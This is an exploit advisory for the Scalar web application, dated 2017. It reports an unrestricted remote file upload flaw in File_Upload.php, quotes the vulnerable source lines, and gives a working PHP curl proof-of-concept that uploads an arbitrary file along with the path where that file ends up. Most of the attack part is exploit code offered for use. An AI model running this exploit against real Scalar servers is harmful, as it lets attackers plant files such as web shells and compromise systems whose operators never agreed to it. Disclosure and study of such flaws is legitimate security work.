[-] Title : Scalar - Remote File Upload Vulnerability [-] Author : Shahab Shamsi [-] Vendor : http://scalar.usc.edu/scalar/ [-] Vendor1: https://github.com/anvc/scalar [-] Category : Webapps [-] Date : 07.April.2017 Vulnerable page : /scalar/system/application/libraries/File_Upload.php Vulnerable Source: 59: unlink($targetFile); 54: $targetFile = $targetPath . '/' . $targetName; 50: $targetPath = confirm_slash(FCPATH) . confirm_slash($slug) . 'media'; 47: function uploadpagethumb($slug, $chmodMode) 53: $targetName = substr_replace($name, "_thumb", strrpos($name, "."), 0); 51: $name = $_FILES['source_file']['name']; 51: $name = $_FILES['source_file']['name']; Exploit : <?php $uploadfile="YourFileName"; $ch = curl_init("http://localhost:8282/scalar/system/application/libraries/File_Upload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('source_file'=>"@$uploadfile")); curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); curl_close($ch); print "$result"; ?> Location : http://localhost:8282/scalar/media/YourFileName [-] Contact Me : SecurityMan.Org